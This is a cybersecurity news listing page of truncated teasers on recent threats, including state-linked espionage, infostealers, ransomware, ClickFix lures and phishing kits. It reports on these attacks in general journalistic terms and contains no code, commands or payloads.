A sophisticated China-linked cyber espionage campaign has emerged, targeting over 1,000 Small Office/Home Office (SOHO) devices worldwide through an advanced Operational Relay Box (ORB) network dubbed “LapDogs.” This covert infrastructure operation, active since September 2023, represents a significant evolution in nation-state cyber…
-
BlueNoroff Hackers Weaponize Zoom App to Attack Systems Using Infostealer Malware
A sophisticated social engineering campaign leveraging the trusted Zoom platform has emerged as the latest weapon in the arsenal of North Korean state-sponsored hackers. The BlueNoroff group, a financially motivated subgroup of the notorious Lazarus Group, has been orchestrating targeted attacks against cryptocurrency and…
-
NCSC Warns of ‘UMBRELLA STAND’ Malware Attacking Fortinet FortiGate Firewalls
The UK’s National Cyber Security Centre (NCSC) has issued a critical warning about a sophisticated malware campaign dubbed “UMBRELLA STAND” that specifically targets internet-facing Fortinet FortiGate 100D series firewalls. This newly identified threat represents a significant escalation in attacks against network infrastructure devices, with the…
-
Prometei Botnet Attacking Linux Servers to Mine Cryptocurrency
Cybersecurity researchers have uncovered a significant resurgence of the Prometei botnet, a sophisticated malware operation targeting Linux servers for cryptocurrency mining and credential theft. This latest campaign, observed since March 2025, demonstrates the evolving nature of cryptomining malware and its persistent threat to enterprise infrastructure worldwide. The…
-
Beware of Weaponized MSI Installer Mimicking WhatsApp That Delivers Modified XWorm RAT
Cybersecurity professionals across East and Southeast Asia are facing a sophisticated new threat as China-linked attackers deploy a weaponized MSI installer disguised as a legitimate WhatsApp setup package. This malicious campaign represents a significant escalation in social engineering tactics, leveraging the popularity and…
-
Hackers Exploit Atlassian’s Model Context Protocol by Submitting a Malicious Support Ticket
A sophisticated attack vector targeting Atlassian’s Model Context Protocol (MCP) allows external threat actors to gain privileged access to internal systems through malicious support tickets. The attack, dubbed “Living off AI,” exploits the trust boundary between external users submitting support requests and…
-
PowerShell Loaders With In-Memory Execution Techniques To Evade Disk-Based Detection
Cybersecurity researchers have uncovered a sophisticated PowerShell-based attack campaign that leverages advanced in-memory execution techniques to bypass traditional disk-based security controls. The malicious infrastructure spans across Chinese, Russian, and global hosting providers, demonstrating the international scope of modern cyber threats. At the center of this…
-
AntiDot – 3-in-1 Android Malware Gives Attackers Full Control of Compromised Devices
A sophisticated new Android botnet malware called AntiDot has emerged as a significant threat to mobile device security, offering cybercriminals unprecedented control over infected devices. This malicious software operates as part of a Malware-as-a-Service (MaaS) model, marketed by threat actor LARVA-398 on underground…
-
Hackers Leverage Cloudflare Tunnels to Infect Systems Using Stealthy Python-Based Malware
A sophisticated malware campaign has emerged that exploits Cloudflare’s tunneling infrastructure to deliver multi-stage Python-based payloads, demonstrating an alarming evolution in cybercriminal tactics. The campaign, tracked as SERPENTINE#CLOUD, represents a significant escalation in the abuse of legitimate cloud services for malicious purposes, combining social…
-
Hackers Using ClickFix Technique to Deploy Remote Access Trojans and Data-Stealing Malware
Cybersecurity researchers have documented a significant surge in attacks utilizing the ClickFix social engineering technique, which has emerged as one of the most effective methods for initial access in modern cyber campaigns. This deceptive tactic tricks users into executing malicious PowerShell commands by…
-
Threat Actors Attacking Cryptocurrency and Blockchain Developers with Weaponized npm and PyPI Packages
The cryptocurrency and blockchain development ecosystem is facing an unprecedented surge in sophisticated malware campaigns targeting the open source supply chain. Over the past year, threat actors have significantly escalated their attacks against Web3 developers by publishing malicious packages to trusted registries…
-
China and Taiwan Accuse Each Other of Cyberattacks Against Critical Infrastructure
Cross-strait tensions have escalated into a new domain as China and Taiwan engage in unprecedented mutual accusations of cyberwarfare targeting critical infrastructure systems. The diplomatic dispute has intensified following Taiwan President Lai Ching-te’s first year in office, during which both governments have publicly traded…
-
Predator Mobile Spyware Remains Consistent with New Design Changes to Evade Detection
Despite sustained international pressure, sanctions, and public exposures over the past two years, the sophisticated Predator mobile spyware has demonstrated remarkable resilience, continuing to evolve and adapt its infrastructure to evade detection while maintaining operations across multiple continents. The mercenary spyware, originally developed…
-
Ransomware Actors Exploit Unpatched SimpleHelp RMM to Compromise Billing Software Provider
Cybersecurity researchers have uncovered a sophisticated ransomware campaign targeting utility billing software providers through unpatched vulnerabilities in SimpleHelp Remote Monitoring and Management (RMM) systems. The attack represents a concerning evolution in ransomware tactics, where threat actors are leveraging trusted remote access tools to establish…
-
Fog Ransomware Actors Exploit Pentesting Tools to Exfiltrate Data and Deploy Ransomware
The Fog ransomware group has evolved beyond conventional attack methods, deploying an unprecedented arsenal of legitimate pentesting tools in a sophisticated May 2025 campaign targeting a financial institution in Asia. This latest operation marks a significant departure from typical ransomware tactics, incorporating employee…
-
Threat Actors Compromise 270+ Legitimate Websites With Malicious JavaScript Using JSFireTruck Obfuscation
Cybersecurity researchers have uncovered a sophisticated malware campaign that leveraged an advanced JavaScript obfuscation technique to compromise hundreds of legitimate websites and redirect unsuspecting visitors to malicious content. The campaign, which infected over 269,000 webpages between March and April 2025, employed a variant…
-
New Rust-Based InfoStealer Extracts Sensitive Data from Chromium-based Browsers
A sophisticated new information-stealing malware written in the Rust programming language has emerged, demonstrating advanced capabilities to extract sensitive data from both Chromium-based and Gecko-based web browsers. The malware, known as Myth Stealer, represents a significant evolution in cybercriminal tactics, combining modern programming techniques with…
-
Hackers Using New ClickFix Technique To Exploit Human Error Via Fake Prompts
Cybersecurity researchers have identified a sophisticated new social engineering campaign that exploits fundamental human trust in everyday computer interactions. The ClickFix technique, which has been actively deployed since March 2024, represents a dangerous evolution in cybercriminal tactics that bypasses traditional security measures by…
-
Hundreds of GitHub Malware Repos Targeting Novice Cybercriminals Linked to Single User
A sophisticated malware distribution campaign has weaponized over 140 GitHub repositories to target inexperienced cybercriminals and gaming cheat users, representing one of the largest documented cases of supply chain attacks on the platform. The repositories, masquerading as legitimate malware tools and game cheats,…
-
New ClickFix Attack Exploits Fake Cloudflare Human Check to Install Malware Silently
A sophisticated new social engineering attack campaign has emerged that exploits users’ familiarity with routine security checks to deliver malware through deceptive Cloudflare verification pages. The ClickFix attack technique represents a concerning evolution in phishing methodology, abandoning traditional file downloads in favor of…
-
DragonForce Ransomware Claimed To Compromise Over 120 Victims in The Past Year
DragonForce, a sophisticated ransomware operation that emerged in fall 2023, has established itself as a formidable threat in the cybercriminal landscape by claiming over 120 victims across the past year. Unlike traditional ransomware-as-a-service models, this threat actor has evolved into what security experts…
-
Hackers Exploit AI Tools Misconfiguration To Run Malicious AI-generated Payloads
Cybercriminals are increasingly leveraging misconfigured artificial intelligence tools to execute sophisticated attacks that generate and deploy malicious payloads automatically, marking a concerning evolution in threat actor capabilities. This emerging attack vector combines traditional configuration vulnerabilities with the power of AI-driven content generation, enabling attackers to…
-
Threat Actors Actively Exploiting Critical vBulletin Vulnerability in the Wild
A critical, unauthenticated remote code execution vulnerability in vBulletin forum software is now being actively exploited. The vulnerability, which impacts vBulletin versions 5.0.0 through 6.0.3, has been assigned CVE-2025-48827 and CVE-2025-48828 and is now being actively targeted by threat actors, marking it as a Known…
-
Threat Actors Leverage Google Apps Script To Host Phishing Websites
Cybercriminals have escalated their tactics by exploiting Google Apps Script, a trusted development platform, to host sophisticated phishing campaigns that bypass traditional security measures. This emerging threat represents a significant shift in how attackers leverage legitimate infrastructure to enhance the credibility of their malicious operations.…
-
LexisNexis Risk Solutions Data Breach Exposes 364,000 Individuals’ Personal Data
LexisNexis Risk Solutions has disclosed a significant data breach affecting approximately 364,000 individuals after discovering that an unauthorized third party gained access to sensitive personal information through a compromised third-party software development platform. The cybersecurity incident, which LexisNexis learned about on April 1, 2025, actually…
-
Tycoon2FA Infra Used by Dadsec Hacker Group to Steal Office365 Credentials
A sophisticated phishing campaign leveraging shared infrastructure between two prominent cybercriminal operations has emerged as a significant threat to Office 365 users worldwide. The Tycoon2FA Phishing-as-a-Service platform, which has been active since August 2023, has established operational connections with the notorious Storm-1575 group, also…
-
Beware of Weaponized AI Tool Installers That Infect Your Devices With Ransomware
Cybercriminals are increasingly exploiting the growing popularity of artificial intelligence tools by distributing sophisticated malware disguised as legitimate AI solution installers. This emerging threat landscape has seen malicious actors create convincing replicas of popular AI platforms, using these deceptive packages to deploy devastating…
-
New Rust-based InfoStealer via Fake CAPTCHA Delivers EDDIESTEALER
Cybersecurity researchers have uncovered a sophisticated malware campaign leveraging deceptive CAPTCHA verification pages to distribute a newly discovered Rust-based infostealer dubbed EDDIESTEALER. This campaign represents a significant evolution in social engineering tactics, where threat actors exploit users’ familiarity with routine security verification processes to trick them into…
-
New Spear-Phishing Attack Targeting Financial Executives by Deploying NetBird Malware
A sophisticated spear-phishing campaign has emerged targeting chief financial officers and senior financial executives across banking, energy, insurance, and investment sectors worldwide, marking a concerning escalation in precision-targeted cyber attacks against corporate leadership. The campaign, which surfaced on May 15, 2025, employs advanced social engineering…
-
W3LL Phishing Kit Actively Attacking Users to Steal Outlook Login Credentials
A sophisticated phishing campaign utilizing the W3LL Phishing Kit has been actively targeting users’ Microsoft Outlook credentials through elaborate impersonation techniques. First identified by Group-IB in 2022, this phishing-as-a-service (PhaaS) tool has evolved into a comprehensive ecosystem complete with its own marketplace called W3LL…
-
APT Group 123 Actively Attacking Windows Systems to Deliver Malicious Payloads
North Korean state-sponsored threat actor APT Group 123 has intensified its cyber espionage campaign, specifically targeting Windows systems across multiple sectors globally. The group, active since at least 2012 and also tracked under aliases such as APT37, Reaper, and ScarCruft, has historically focused on…
-
New FrigidStealer Malware Attacking macOS Users to Steal Login Credentials
FrigidStealer, a sophisticated information-stealing malware that emerged in January 2025, is actively targeting macOS endpoints to steal sensitive user data through deceptive tactics. Unlike traditional malware, FrigidStealer exploits user trust in routine software updates, making it particularly insidious. The malware has raised significant concerns among…
-
Recurring Supply-Chain Lapses Expose UEFI Firmware to Pre-OS Threats
A disturbing pattern of security failures in the firmware supply chain continues to expose millions of devices to pre-OS threats, potentially undermining the foundation of computer security. Between 2022 and 2025, a series of critical security incidents involving leaked cryptographic keys and mismanagement of signing certificates…
-
New Phishing Attack Abusing Blob URLs to Bypass SEGs and Evade Analysis
Cybersecurity experts have identified a sophisticated phishing technique that exploits blob URIs (Uniform Resource Identifiers) to evade detection by Secure Email Gateways (SEGs) and security analysis tools. This emerging attack method leverages the unique properties of blob URIs, which are designed to display…